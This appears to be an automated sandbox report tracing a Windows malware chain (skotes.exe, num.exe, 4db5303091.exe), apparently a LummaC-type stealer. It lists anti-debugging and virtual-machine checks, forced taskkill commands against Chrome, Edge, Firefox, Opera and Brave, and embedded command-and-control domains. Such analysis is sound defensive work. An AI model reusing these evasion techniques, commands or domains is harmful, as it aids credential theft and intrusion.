Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_00EB979D
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 7_2_00EB9B2B
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB5C97 FindFirstFileW,FindNextFileW,FindClose, 7_2_00EB5C97
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 22_2_0064E430
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_006538B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 22_2_006538B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00654570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 22_2_00654570
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 22_2_0064ED20
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_00654910
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 22_2_0064BE70
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0064DE10
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_006416D0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 22_2_00653EA0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 22_2_0064F6B0
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 22_2_0064DA80
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00E442DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: 4db5303091.exe, 4db5303091.exe, 00000036.00000002.3035896265.00000000004CA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 4db5303091.exe, 00000019.00000003.2829967396.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy6.
Source: xwZfYpo16i.exe, 00000000.00000003.2095176900.0000000001520000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: num.exe, 00000016.00000002.2737892178.00000000014BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: num.exe, 00000016.00000002.2737892178.000000000145E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP$L
Source: num.exe, 00000016.00000002.2737892178.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2848280275.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000003.2829967396.0000000000E3D000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000019.00000002.2847916008.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000029.00000002.2898759445.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000029.00000002.2898759445.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000003.3031689327.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037495843.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, 4db5303091.exe, 00000036.00000002.3037146938.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: num.exe, 00000029.00000002.2898759445.0000000000A27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: xwZfYpo16i.exe, 00000000.00000002.2132189808.0000000000416000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2157363835.0000000000CF6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2158512198.0000000000CF6000.00000040.00000001.01000000.00000007.sdmp, 4db5303091.exe, 00000019.00000002.2846058682.00000000004CA000.00000040.00000001.01000000.0000000D.sdmp, 4db5303091.exe, 00000036.00000002.3035896265.00000000004CA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: xwZfYpo16i.exe, 00000000.00000002.2132189808.0000000000416000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2157363835.0000000000CF6000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2158512198.0000000000CF6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: qEMUMJ
Source: num.exe, 00000029.00000002.2898759445.0000000000A27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareK
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\xwZfYpo16i.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Code function: 0_2_05490DAE rdtsc 0_2_05490DAE
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EBEAA2 BlockInput, 7_2_00EBEAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00E72622
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_006445C0 VirtualProtect ?,00000004,00000100,00000000 22_2_006445C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00E442DE
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E64CE8 mov eax, dword ptr fs:[00000030h] 7_2_00E64CE8
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00659750 mov eax, dword ptr fs:[00000030h] 22_2_00659750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 7_2_00EA0B62
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00E72622
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00E6083F
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E609D5 SetUnhandledExceptionFilter, 7_2_00E609D5
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00E60C21
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0065AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0065AD48
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0065CEEA SetUnhandledExceptionFilter, 22_2_0065CEEA
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_0065B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0065B33A
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: num.exe PID: 2448, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 3568, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe, type: DROPPED
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
LummaC encrypted strings found
Source: 4db5303091.exe String found in binary or memory: clearancek.site
Source: 4db5303091.exe String found in binary or memory: licendfilteo.site
Source: 4db5303091.exe String found in binary or memory: spirittunek.stor
Source: 4db5303091.exe String found in binary or memory: bathdoomgaz.stor
Source: 4db5303091.exe String found in binary or memory: studennotediw.stor
Source: 4db5303091.exe String found in binary or memory: dissapoiznw.stor
Source: 4db5303091.exe String found in binary or memory: eaglepawnoy.stor
Source: 4db5303091.exe String found in binary or memory: mobbipenju.stor
Searches for specific processes (likely to inject)
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: 22_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 22_2_00659600
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_00EA1201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E82BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 7_2_00E82BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAB226 SendInput,keybd_event, 7_2_00EAB226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EC22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 7_2_00EC22DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe "C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000336001\num.exe "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 7_2_00EA0B62
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_00EA1663
Source: cb428cafc9.exe, 00000007.00000002.3852269897.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, cb428cafc9.exe, 0000001A.00000000.2802596566.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, cb428cafc9.exe, 00000045.00000002.4394162441.0000000000F02000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000003.00000002.2158512198.0000000000CF6000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: cb428cafc9.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
